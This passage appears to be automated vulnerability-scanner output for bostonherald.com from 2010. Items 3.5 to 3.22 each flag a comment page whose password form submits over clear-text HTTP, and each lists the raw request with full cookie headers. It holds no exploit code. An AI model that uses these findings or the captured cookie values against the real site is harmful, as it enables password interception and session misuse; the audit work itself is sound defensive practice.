Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.6. http://bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3

The form contains the following password fields:

password
confirm_password

Request

GET /news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

The form contains the following password fields:

password
confirm_password

Request

GET /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.16. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.20. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active

The form contains the following password fields:

password
confirm_password

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

The form contains the following password fields:

password
confirm_password

Request

GET /sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
